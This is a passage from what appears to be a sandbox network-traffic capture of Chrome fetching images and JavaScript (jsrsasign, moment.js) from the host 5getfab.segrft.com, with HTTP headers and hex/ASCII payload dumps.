                                                      2025-01-12 23:47:52 UTC4096INData Raw: 6f 6d 70 61 72 65 54 6f 28 65 2e 4f 4e 45 29 26 26 61 2e 71 2e 69 73 50 72 6f 62 61 62 6c 65 50 72 69 6d 65 28 31 30 29 3f 73 65 74 54 69 6d 65 6f 75 74 28 72 2c 30 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 30 29 7d 29 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 70 3d 69 28 29 2c 61 2e 70 2e 66 72 6f 6d 4e 75 6d 62 65 72 41 73 79 6e 63 28 74 2d 6f 2c 31 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 70 2e 73 75 62 74 72 61 63 74 28 65 2e 4f 4e 45 29 2e 67 63 64 61 28 68 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 30 3d 3d 74 2e 63 6f 6d 70 61 72 65 54 6f 28 65 2e 4f 4e 45 29 26 26 61 2e 70 2e 69 73 50 72 6f 62 61 62 6c 65 50 72 69 6d 65 28 31 30 29 3f 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 30 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 2c 30 29
                                                      Data Ascii: ompareTo(e.ONE)&&a.q.isProbablePrime(10)?setTimeout(r,0):setTimeout(c,0)})})},f=function(){a.p=i(),a.p.fromNumberAsync(t-o,1,n,function(){a.p.subtract(e.ONE).gcda(h,function(t){0==t.compareTo(e.ONE)&&a.p.isProbablePrime(10)?setTimeout(c,0):setTimeout(f,0)
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 6f 66 74 77 61 72 65 2e 0a 20 2a 2f 0a 2f 2a 2a 0a 20 2a 20 40 66 69 6c 65 4f 76 65 72 76 69 65 77 0a 20 2a 20 40 6e 61 6d 65 20 61 73 6e 31 2d 31 2e 30 2e 6a 73 0a 20 2a 20 40 61 75 74 68 6f 72 20 4b 65 6e 6a 69 20 55 72 75 73 68 69 6d 61 20 6b 65 6e 6a 69 2e 75 72 75 73 68 69 6d 61 40 67 6d 61 69 6c 2e 63 6f 6d 0a 20 2a 20 40 76 65 72 73 69 6f 6e 20 31 2e 30 2e 32 20 28 32 30 31 33 2d 4d 61 79 2d 33 30 29 0a 20 2a 20 40 73 69 6e 63 65 20 32 2e 31 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6b 6a 75 72 2e 67 69 74 68 75 62 2e 69 6f 2f 6a 73 72 73 61 73 69 67 6e 2f 6c 69 63 65 6e 73 65 2f 22 3e 4d 49 54 20 4c 69 63 65 6e 73 65 3c 2f 61 3e 0a 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20
                                                      Data Ascii: oftware. *//** * @fileOverview * @name asn1-1.0.js * @author Kenji Urushima kenji.urushima@gmail.com * @version 1.0.2 (2013-May-30) * @since 2.1 * @license <a href="http://kjur.github.io/jsrsasign/license/">MIT License</a> */"undefined"!=typeof
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 74 68 69 73 2e 68 56 3d 4b 4a 55 52 2e 61 73 6e 31 2e 41 53 4e 31 55 74 69 6c 2e 62 69 67 49 6e 74 54 6f 4d 69 6e 54 77 6f 73 43 6f 6d 70 6c 65 6d 65 6e 74 73 48 65 78 28 74 29 7d 2c 74 68 69 73 2e 73 65 74 42 79 49 6e 74 65 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 3d 6e 65 77 20 65 28 53 74 72 69 6e 67 28 74 29 2c 31 30 29 3b 74 68 69 73 2e 73 65 74 42 79 42 69 67 49 6e 74 65 67 65 72 28 69 29 7d 2c 74 68 69 73 2e 73 65 74 56 61 6c 75 65 48 65 78 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 68 56 3d 74 7d 2c 74 68 69 73 2e 67 65 74 46 72 65 73 68 56 61 6c 75 65 48 65 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 56 7d 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 26 26 28
                                                      Data Ascii: this.hV=KJUR.asn1.ASN1Util.bigIntToMinTwosComplementsHex(t)},this.setByInteger=function(t){var i=new e(String(t),10);this.setByBigInteger(i)},this.setValueHex=function(t){this.hV=t},this.getFreshValueHex=function(){return this.hV},"undefined"!=typeof t&&(
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 52 49 41 35 53 74 72 69 6e 67 2c 4b 4a 55 52 2e 61 73 6e 31 2e 44 45 52 41 62 73 74 72 61 63 74 53 74 72 69 6e 67 29 2c 4b 4a 55 52 2e 61 73 6e 31 2e 44 45 52 55 54 43 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4b 4a 55 52 2e 61 73 6e 31 2e 44 45 52 55 54 43 54 69 6d 65 2e 73 75 70 65 72 63 6c 61 73 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 2c 74 68 69 73 2e 68 54 3d 22 31 37 22 2c 74 68 69 73 2e 73 65 74 42 79 44 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 68 54 4c 56 3d 6e 75 6c 6c 2c 74 68 69 73 2e 69 73 4d 6f 64 69 66 69 65 64 3d 21 30 2c 74 68 69 73 2e 64 61 74 65 3d 74 2c 74 68 69 73 2e 73 3d 74 68 69 73 2e 66 6f 72 6d 61 74 44 61 74 65 28 74 68 69 73 2e 64 61 74 65 2c 22 75 74 63 22 29
                                                      Data Ascii: RIA5String,KJUR.asn1.DERAbstractString),KJUR.asn1.DERUTCTime=function(t){KJUR.asn1.DERUTCTime.superclass.constructor.call(this,t),this.hT="17",this.setByDate=function(t){this.hTLV=null,this.isModified=!0,this.date=t,this.s=this.formatDate(this.date,"utc")


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      65192.168.2.44981720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:51 UTC652OUTGET /images_plus/index/panel_b_bg.jpg HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:52 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:52 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 4267
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:10 GMT
                                                      ETag: "5fc5abde-10ab"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:52 UTC3740INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 6f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                      Data Ascii: ExifII*DuckyPohttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xm
                                                      2025-01-12 23:47:52 UTC527INData Raw: 2e 8a dc 73 df 2b d6 ff 00 81 9e 55 8b 8c ef 95 22 ff 00 81 9e 5a dc 70 4e 4a 6f f8 17 96 7f e8 1c bc cb a5 7b e8 34 10 68 20 d0 41 a0 8d 45 ba 84 3d 18 90 69 48 71 6f 90 8d 69 12 1c 5b aa 91 a8 b7 44 8a 45 ba 24 52 2d d4 48 a4 5b a3 3b 8a d6 dd 19 dc 56 b6 ea b3 b8 bd 6d d4 63 71 d1 5b 74 63 71 d1 5b 74 63 71 d3 4b 74 63 71 d3 5b f4 73 dc 75 52 fd 1c b7 1d 74 bf 46 37 1d 34 bf 47 2d c7 55 2f d1 8d f2 e9 ad fa 31 b8 bd 6f d1 cf 7c af 5b f5 19 e5 68 fe cf e3 e4 67 7c b7 1f d9 d1 39 6b 7d 19 e4 7f d3 a2 f2 c6 fa ab cb cd 5a ea bd d4 1a e8 41 ae 84 1a e8 41 ae 84 38 b7 44 6b 5d 31 20 d7 54 82 2d d4 23 5a e8 91 a8 b7 55 23 51 6e a1 1b 8b 74 66 29 16 e8 45 22 dd 19 dc 52 2d d1 9d c5 ab 6e 8c ee 2d 5b f4 63 71 7a df a3 11 d1 5b f4 63 71 d1 4b f4 73 dc 74 d2 fd
                                                      Data Ascii: .s+U"ZpNJo{4h AE=iHqoi[DE$R-H[;Vmcq[tcq[tcqKtcq[suRtF74G-U/1o|[hg|9k}ZAA8Dk]1 T-#ZU#Qntf)E"R-n-[cqz[cqKst


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      66192.168.2.44981820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:51 UTC378OUTGET /images_plus/header/common/spiler.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:52 UTC354INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:52 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 1002
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 05:05:00 GMT
                                                      ETag: "5fc7207c-3ea"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:52 UTC1002INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 1c 08 02 00 00 00 c4 08 f9 98 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 69 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20
                                                      Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<iiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      67192.168.2.44981920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:51 UTC381OUTGET /plus/js/custom/moment.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:52 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:52 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 127757
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1f30d"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:52 UTC3776INData Raw: 2f 2f 21 20 6d 6f 6d 65 6e 74 2e 6a 73 0d 0a 2f 2f 21 20 76 65 72 73 69 6f 6e 20 3a 20 32 2e 31 37 2e 31 0d 0a 2f 2f 21 20 61 75 74 68 6f 72 73 20 3a 20 54 69 6d 20 57 6f 6f 64 2c 20 49 73 6b 72 65 6e 20 43 68 65 72 6e 65 76 2c 20 4d 6f 6d 65 6e 74 2e 6a 73 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0d 0a 2f 2f 21 20 6c 69 63 65 6e 73 65 20 3a 20 4d 49 54 0d 0a 2f 2f 21 20 6d 6f 6d 65 6e 74 6a 73 2e 63 6f 6d 0d 0a 0d 0a 3b 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 29 20 7b 0d 0a 20 20 20 20 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 20 26 26 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d
                                                      Data Ascii: //! moment.js//! version : 2.17.1//! authors : Tim Wood, Iskren Chernev, Moment.js contributors//! license : MIT//! momentjs.com;(function (global, factory) { typeof exports === 'object' && typeof module !== 'undefined' ? module.exports =
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 73 4e 6f 77 56 61 6c 69 64 20 3d 20 69 73 4e 6f 77 56 61 6c 69 64 20 26 26 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 61 67 73 2e 63 68 61 72 73 4c 65 66 74 4f 76 65 72 20 3d 3d 3d 20 30 20 26 26 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 61 67 73 2e 75 6e 75 73 65 64 54 6f 6b 65 6e 73 2e 6c 65 6e 67 74 68 20 3d 3d 3d 20 30 20 26 26 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 61 67 73 2e 62 69 67 48 6f 75 72 20 3d 3d 3d 20 75 6e 64 65 66 69 6e 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a 65 6e 20 3d 3d 20 6e 75 6c 6c 20 7c 7c 20 21 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a
                                                      Data Ascii: ) { isNowValid = isNowValid && flags.charsLeftOver === 0 && flags.unusedTokens.length === 0 && flags.bigHour === undefined; } if (Object.isFrozen == null || !Object.isFroz
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 20 20 20 20 20 20 20 20 20 20 61 72 67 20 3d 20 27 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 61 72 67 75 6d 65 6e 74 73 5b 69 5d 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 67 20 2b 3d 20 27 5c 6e 5b 27 20 2b 20 69 20 2b 20 27 5d 20 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 6b 65 79 20 69 6e 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 67 20 2b 3d 20 6b 65 79 20 2b 20 27 3a 20 27 20 2b 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 5b 6b 65 79 5d 20 2b 20 27 2c 20 27 3b 0d 0a 20 20 20 20 20 20 20
                                                      Data Ascii: arg = ''; if (typeof arguments[i] === 'object') { arg += '\n[' + i + '] '; for (var key in arguments[0]) { arg += key + ': ' + arguments[0][key] + ', ';
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 74 68 69 73 2e 5f 69 6e 76 61 6c 69 64 44 61 74 65 3b 0d 0a 7d 0d 0a 0d 0a 76 61 72 20 64 65 66 61 75 6c 74 4f 72 64 69 6e 61 6c 20 3d 20 27 25 64 27 3b 0d 0a 76 61 72 20 64 65 66 61 75 6c 74 4f 72 64 69 6e 61 6c 50 61 72 73 65 20 3d 20 2f 5c 64 7b 31 2c 32 7d 2f 3b 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 6f 72 64 69 6e 61 6c 20 28 6e 75 6d 62 65 72 29 20 7b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6f 72 64 69 6e 61 6c 2e 72 65 70 6c 61 63 65 28 27 25 64 27 2c 20 6e 75 6d 62 65 72 29 3b 0d 0a 7d 0d 0a 0d 0a 76 61 72 20 64 65 66 61 75 6c 74 52 65 6c 61 74 69 76 65 54 69 6d 65 20 3d 20 7b 0d 0a 20 20 20 20 66 75 74 75 72 65 20 3a 20 27 69 6e 20 25 73 27 2c 0d 0a 20 20 20 20 70 61 73 74 20 20 20 3a 20 27 25 73 20 61 67 6f 27 2c 0d 0a 20 20 20
                                                      Data Ascii: this._invalidDate;}var defaultOrdinal = '%d';var defaultOrdinalParse = /\d{1,2}/;function ordinal (number) { return this._ordinal.replace('%d', number);}var defaultRelativeTime = { future : 'in %s', past : '%s ago',
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 6f 6b 65 6e 20 28 74 6f 6b 65 6e 2c 20 70 61 64 64 65 64 2c 20 6f 72 64 69 6e 61 6c 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 66 75 6e 63 20 3d 20 63 61 6c 6c 62 61 63 6b 3b 0d 0a 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 63 61 6c 6c 62 61 63 6b 20 3d 3d 3d 20 27 73 74 72 69 6e 67 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 5b 63 61 6c 6c 62 61 63 6b 5d 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 69 66 20 28 74 6f 6b 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6f 72 6d 61 74 54 6f 6b 65 6e 46 75 6e 63 74 69 6f 6e 73 5b 74 6f 6b 65 6e 5d 20 3d 20 66 75
                                                      Data Ascii: oken (token, padded, ordinal, callback) { var func = callback; if (typeof callback === 'string') { func = function () { return this[callback](); }; } if (token) { formatTokenFunctions[token] = fu
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 27 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 28 5c 5b 29 7c 5c 5c 28 5c 5d 29 7c 5c 5b 28 5b 5e 5c 5d 5c 5b 5d 2a 29 5c 5d 7c 5c 5c 28 2e 29 2f 67 2c 20 66 75 6e 63 74 69 6f 6e 20 28 6d 61 74 63 68 65 64 2c 20 70 31 2c 20 70 32 2c 20 70 33 2c 20 70 34 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 70 31 20 7c 7c 20 70 32 20 7c 7c 20 70 33 20 7c 7c 20 70 34 3b 0d 0a 20 20 20 20 7d 29 29 3b 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 72 65 67 65 78 45 73 63 61 70 65 28 73 29 20 7b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 73 2e 72 65 70 6c 61 63 65 28 2f 5b 2d 5c 2f 5c 5c 5e 24 2a 2b 3f 2e 28 29 7c 5b 5c 5d 7b 7d 5d 2f 67 2c 20 27 5c 5c 24 26 27 29 3b 0d 0a 7d 0d 0a 0d 0a 76 61 72 20 74 6f 6b 65 6e 73 20 3d 20 7b 7d 3b 0d 0a 0d 0a 66 75 6e 63
                                                      Data Ascii: '').replace(/\\(\[)|\\(\])|\[([^\]\[]*)\]|\\(.)/g, function (matched, p1, p2, p3, p4) { return p1 || p2 || p3 || p4; }));}function regexEscape(s) { return s.replace(/[-\/\\^$*+?.()|[\]{}]/g, '\\$&');}var tokens = {};func
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 5f 6c 6f 6e 67 4d 6f 6e 74 68 73 50 61 72 73 65 5b 69 5d 20 3d 20 74 68 69 73 2e 6d 6f 6e 74 68 73 28 6d 6f 6d 2c 20 27 27 29 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 69 66 20 28 73 74 72 69 63 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 66 6f 72 6d 61 74 20 3d 3d 3d 20 27 4d 4d 4d 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 69 20 3d 20 69 6e 64 65 78 4f 66 24 31 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 73 68 6f 72 74 4d 6f 6e 74 68 73 50 61 72 73 65 2c 20 6c 6c 63 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 69 20 21 3d 3d 20 2d 31 20 3f 20 69 69 20 3a 20 6e 75 6c 6c
                                                      Data Ascii: this._longMonthsParse[i] = this.months(mom, '').toLocaleLowerCase(); } } if (strict) { if (format === 'MMM') { ii = indexOf$1.call(this._shortMonthsParse, llc); return ii !== -1 ? ii : null
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 75 6e 63 74 69 6f 6e 20 6d 6f 6e 74 68 73 52 65 67 65 78 20 28 69 73 53 74 72 69 63 74 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 74 68 69 73 2e 5f 6d 6f 6e 74 68 73 50 61 72 73 65 45 78 61 63 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 68 61 73 4f 77 6e 50 72 6f 70 28 74 68 69 73 2c 20 27 5f 6d 6f 6e 74 68 73 52 65 67 65 78 27 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6d 70 75 74 65 4d 6f 6e 74 68 73 50 61 72 73 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 73 53 74 72 69 63 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6d 6f 6e 74 68 73 53 74 72 69 63 74 52 65 67 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 20 65
                                                      Data Ascii: unction monthsRegex (isStrict) { if (this._monthsParseExact) { if (!hasOwnProp(this, '_monthsRegex')) { computeMonthsParse.call(this); } if (isStrict) { return this._monthsStrictRegex; } e
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 75 72 6e 20 64 61 74 65 3b 0d 0a 7d 0d 0a 0d 0a 2f 2f 20 73 74 61 72 74 2d 6f 66 2d 66 69 72 73 74 2d 77 65 65 6b 20 2d 20 73 74 61 72 74 2d 6f 66 2d 79 65 61 72 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 69 72 73 74 57 65 65 6b 4f 66 66 73 65 74 28 79 65 61 72 2c 20 64 6f 77 2c 20 64 6f 79 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 2f 2f 20 66 69 72 73 74 2d 77 65 65 6b 20 64 61 79 20 2d 2d 20 77 68 69 63 68 20 6a 61 6e 75 61 72 79 20 69 73 20 61 6c 77 61 79 73 20 69 6e 20 74 68 65 20 66 69 72 73 74 20 77 65 65 6b 20 28 34 20 66 6f 72 20 69 73 6f 2c 20 31 20 66 6f 72 20 6f 74 68 65 72 29 0d 0a 20 20 20 20 20 20 20 20 66 77 64 20 3d 20 37 20 2b 20 64 6f 77 20 2d 20 64 6f 79 2c 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 66 69 72 73 74 2d 77 65 65 6b 20 64 61 79 20 6c 6f
                                                      Data Ascii: urn date;}// start-of-first-week - start-of-yearfunction firstWeekOffset(year, dow, doy) { var // first-week day -- which january is always in the first week (4 for iso, 1 for other) fwd = 7 + dow - doy, // first-week day lo
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 6e 28 27 64 27 2c 20 20 20 20 6d 61 74 63 68 31 74 6f 32 29 3b 0d 0a 61 64 64 52 65 67 65 78 54 6f 6b 65 6e 28 27 65 27 2c 20 20 20 20 6d 61 74 63 68 31 74 6f 32 29 3b 0d 0a 61 64 64 52 65 67 65 78 54 6f 6b 65 6e 28 27 45 27 2c 20 20 20 20 6d 61 74 63 68 31 74 6f 32 29 3b 0d 0a 61 64 64 52 65 67 65 78 54 6f 6b 65 6e 28 27 64 64 27 2c 20 20 20 66 75 6e 63 74 69 6f 6e 20 28 69 73 53 74 72 69 63 74 2c 20 6c 6f 63 61 6c 65 29 20 7b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 6c 6f 63 61 6c 65 2e 77 65 65 6b 64 61 79 73 4d 69 6e 52 65 67 65 78 28 69 73 53 74 72 69 63 74 29 3b 0d 0a 7d 29 3b 0d 0a 61 64 64 52 65 67 65 78 54 6f 6b 65 6e 28 27 64 64 64 27 2c 20 20 20 66 75 6e 63 74 69 6f 6e 20 28 69 73 53 74 72 69 63 74 2c 20 6c 6f 63 61 6c 65 29 20 7b 0d 0a 20 20 20
                                                      Data Ascii: n('d', match1to2);addRegexToken('e', match1to2);addRegexToken('E', match1to2);addRegexToken('dd', function (isStrict, locale) { return locale.weekdaysMinRegex(isStrict);});addRegexToken('ddd', function (isStrict, locale) {


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      68192.168.2.44982020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:52 UTC657OUTGET /images_plus/index/sec-nav-bg-grad.gif HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
